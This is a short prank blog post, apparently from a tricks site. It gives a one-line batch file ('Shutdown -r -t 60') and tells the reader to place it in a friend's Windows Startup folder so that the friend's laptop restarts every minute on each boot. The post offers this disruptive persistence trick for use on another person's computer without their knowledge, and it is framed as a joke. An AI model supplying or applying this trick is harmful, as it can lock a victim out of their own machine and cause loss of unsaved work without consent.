Search the Whole World Here.,.,

The Damn Shutdown


Warning : Ok I must warn you first, this one is wild, use it at your own risk. 

What is the computer trick?

Your friend’s laptop will get restart automatically in every minute .

How is this done?

This has two parts. First we have make a code to shutdown computer and then we have to execute it each time the computer boots.

Part I


Copy following code into notepad and save it as Prank.bat .




Shutdown –r –t 60
Explanation of code
Shutdown is command, “r “means restart you can use “s” for shutdown, 60 is time in sec. Like if you want time to be 5 min then use 300 instead of 60.
Part II
Second step we have to move prank.bat folder in startup folder. To find startup folder go to start then programs then startup. Now cut and paste prank.bat into startup folder.


EmoticonEmoticon